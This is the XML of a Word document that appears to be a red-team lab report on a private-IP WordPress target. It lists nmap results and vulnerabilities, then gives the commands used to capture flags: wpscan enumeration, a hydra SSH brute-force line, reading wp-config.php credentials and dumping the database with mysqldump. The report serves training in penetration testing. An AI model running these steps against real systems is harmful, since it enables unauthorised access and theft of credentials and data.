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C5292" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="red-team-summary-of-operations"/>
      <w:r>
        <w:t>Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148852E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="table-of-contents"/>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629FCE5" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7A618" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BDCCE" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5922AEDD" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="exposed-services"/>
      <w:r>
        <w:t>Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B40EF" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916D2D6" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>-sV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192.168.1.110 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3368E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685C4543" wp14:editId="36D9FF98">
            <wp:extent cx="4472107" cy="243583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nmap-target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0C51E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>This scan identifies the services below as potential points of entry on Target 1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7"/>
        <w:gridCol w:w="2292"/>
        <w:gridCol w:w="2076"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F08F3" w14:paraId="38D23583" w14:textId="77777777" w:rsidTr="003F08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470071" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E8C24C" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572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4672AFE1" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="271CB8CB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735BB635" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="206A045E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Open SSH 6.7p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E366065" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>22/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="66EDC6B7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13E9FCC5" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1292CDD0" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Apache httpd 2.4.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EE598A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>80/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="1F740865" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AED548A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD107DB" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>2-4 (RPC #100000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2727083E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>111/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="11DF3B25" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4172C450" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE1FEB0" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Samba smbd 3.X-4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF486AB" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>139/TCP445/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AB2800E" w14:textId="77777777" w:rsidR="00A36E7D" w:rsidRDefault="00A36E7D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D851D1" w14:textId="77777777" w:rsidR="00A36E7D" w:rsidRDefault="00A36E7D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BECB902" w14:textId="1CE755EE" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The following vulnerabilities were identified on Target 1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8"/>
        <w:gridCol w:w="2363"/>
        <w:gridCol w:w="5415"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F08F3" w14:paraId="56645B2A" w14:textId="77777777" w:rsidTr="003F08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824EE8" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3919D134" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572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2E7B9733" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="520A474C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630A39B7" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A550B0F" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Default configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B95EF4D" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>allowed user enumerat</w:t>
            </w:r>
            <w:r>
              <w:t>ion and password brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="2AF4B390" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F5DFEC8" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04042623" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Poor/default configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E37BA59" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>gave the attacker remote access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="1B427BBE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08995CE1" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8CD4BD" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Weak/default passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BCA4EEB" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>granted access to user logins and SQL database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F08F3" w14:paraId="46441F17" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6091F0ED" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>User Permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D4AA2F" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Weak/default permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E91B11A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>allowed attacker to explore the filesystem and execute commands to exfiltrate data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E699DBB" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="exploitation"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4E9BE" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Red Team was able to penetrate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271823EC" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag1.txt</w:t>
      </w:r>
      <w:r>
        <w:t>: b9bbcb33e11b80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426DEFD" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit Wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424569F9" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use WP scan to enumerate users and vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF5C08" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wpscan --url 192.168.1.110/wordpress -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="642F4568" wp14:editId="048682CC">
            <wp:extent cx="5334000" cy="342933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wpscan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75481AF" wp14:editId="3FFFEB8B">
            <wp:extent cx="5334000" cy="300592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wpscan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7FC0C96" wp14:editId="7B7BAF34">
            <wp:extent cx="5334000" cy="148140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wpscan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A924D" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit SSH and weak passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B3CF6" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSH into the target using one of the enumerated user names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E6A8E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I was able to gu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ess Michael’s password with only two tries. If I had failed after a few other common passwords I would have resorted to a brute force attack to gain a password. If I had to use a brute force attack I could have used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFAA47A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.1.110 ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FD607D" wp14:editId="5D6B8C53">
            <wp:extent cx="4556631" cy="151375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sh_michael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49C75" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit user prmissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367320ED" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Because user access to the wordpress folders were unrestricted I was able to do a simple search for flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2F7A4" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>grep --color=auto -r flag[1-4] /var/www</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F34218" wp14:editId="6C3B4272">
            <wp:extent cx="5334000" cy="113044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grepflags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33CB9" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag2.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>fc3fd58dcdad9ab23faca6e9a36e581c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5D5FA5" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It looks like I got lucky with the grep search and got a bonus flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B2000" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lets see what else we can find since the first two flags were found at the same time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277586B" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag3.txt</w:t>
      </w:r>
      <w:r>
        <w:t>: afc01ab56b5091e7dccf93122770cd2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1787F876" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56537672" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>ets see what else we can find in Wordpress’s folder structure. A configuration file might give us some hints at what else we can access easily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3DA5D" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and tab autocomplete to quickly see what was in each folder before deciding which folders to “move” in</w:t>
      </w:r>
      <w:r>
        <w:t>to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D11A7" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cat /var/www/html/wordpress/wp-config.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3871044E" wp14:editId="62BEFCAD">
            <wp:extent cx="4395267" cy="372675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ql-logi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B14C7" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have a database with a user and password, lets see whats inside by dumping the data base. This can be done with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. I prefer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> because the output can be manipulated with stream edit</w:t>
      </w:r>
      <w:r>
        <w:t>ors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F08D95B" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysqldump -u root -p --skip-extended-insert wordpress | grep --color=auto flag[3-4]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F0589B" wp14:editId="46841164">
            <wp:extent cx="5334000" cy="74581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ql_dump_flag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74156" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag4.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : 715dea6c055b9fe3337544932f2941ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE272CF" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
